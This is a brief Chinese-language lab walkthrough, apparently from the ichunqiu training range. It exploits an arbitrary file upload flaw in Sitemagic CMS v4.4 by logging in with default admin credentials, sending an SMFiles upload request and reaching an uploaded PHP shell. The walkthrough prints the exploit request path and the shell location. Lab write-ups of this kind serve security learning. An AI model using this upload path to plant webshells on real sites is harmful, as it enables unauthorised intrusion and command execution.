声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
靶场介绍
Sitemagic CMS v4.4 index.php?SMExt=SMFiles 存在任意文件上传漏洞,攻击者可上传恶意代码执行系统命令
春秋云镜开启靶场:
http://eci-2zebxdyfuuxgev2t0qmk.cloudeci1.ichunqiu.com
先登录后台
账号admin 密码admin
payload:
/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages
上传shell
http://eci-2zebxdyfuuxgev2t0qmk.cloudeci1.ichunqiu.com/files/images/1.php